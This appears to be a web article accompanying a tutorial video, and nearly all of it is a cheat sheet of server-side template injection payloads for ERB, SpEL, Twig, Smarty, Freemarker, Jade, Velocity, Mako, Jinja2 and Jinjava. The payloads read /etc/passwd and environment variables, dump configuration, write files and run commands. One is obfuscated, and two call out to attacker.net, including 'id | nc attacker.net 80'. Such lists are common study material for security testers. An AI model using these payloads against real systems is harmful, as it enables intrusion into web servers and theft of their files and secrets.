Server Side Template Injection Payloads

We hope you have completed watching our Server Side Template Injection tutorial video on our Youtube Channel. If you are still left to watch the video then you should do that before going through this article because it will not make sense to you if you unaware about Server Side Template Injection vulnerability. We are attaching the video here so that you can easily watch the video.

Server Side Template Injection Vulnerability Tutorial Video

List of different payloads

Ruby

Basic Injection

<%= 7 * 7 %>

Retrieve /etc/passwd

<%= File.open('/etc/passwd').read %>

List files and directories

<%= Dir.entries('/') %>

Java

Basic injection

${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}

Retrieve the system’s environment variables

${T(java.lang.System).getenv()}

Retrieve /etc/passwd

${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

Twig

Basic Injection

{{7*7}}

{{7*'7'}} would result in 49

Code execution

{{self}}

{{_self.env.setCache("ftp://attacker.net:2121")}}

{{_self.env.loadTemplate("backdoor")}}

{{_self.env.registerUndefinedFilterCallback("exec")}}

{{_self.env.getFilter("id")}}

Smarty

{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}

Freemarker

Basic injection

${3*3}

#{3*3}

Code execution

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}

${"freemarker.template.utility.Execute"?new()("id")}

Jade / Codepen

- var x = root.process

- x = x.mainModule.require

- x = x('child_process')

= x.exec('id | nc attacker.net 80')

Velocity

#set($str=$class.inspect("java.lang.String").type)

#set($chr=$class.inspect("java.lang.Character").type)

#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))$ex.waitFor()

#set($out=$ex.getInputStream())

#foreach($i in [1..$out.available()])

$str.valueOf($chr.toChars($out.read()))

#end

Mako

<%
import os
x=os.popen('id').read()
%>
${x}

Jinja2

Basic injection

{{4*4}}[[5*5]]

{{7*'7'}} would result in 7777777

{{config.items()}}

Dump all used classes

{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}

Dump all config variables

{% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %}

Read remote file

# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}

Write into remote file

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}

Remote Code Execution

Listen for Connection

nv -lnvp 8000

Jinjava

Basic injection

{{'a'.toUpperCase()}} would result in 'A'

{{ request }} would return a request object like com.

[...].context.TemplateContextRequest@23548206

Command execution

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

Server Side Template Injection Vulnerability Tutorial Video

List of different payloads

Ruby

Basic Injection

Retrieve /etc/passwd

List files and directories

Java

Basic injection

Retrieve the system’s environment variables

Retrieve /etc/passwd

Twig

Basic Injection

Code execution

Smarty

Freemarker

Basic injection

Code execution

Jade / Codepen

Velocity

Mako

Jinja2

Basic injection

Dump all used classes

Dump all config variables

Read remote file

Write into remote file

Remote Code Execution

Jinjava

Basic injection

Command execution

Leave a Comment Cancel Reply

Login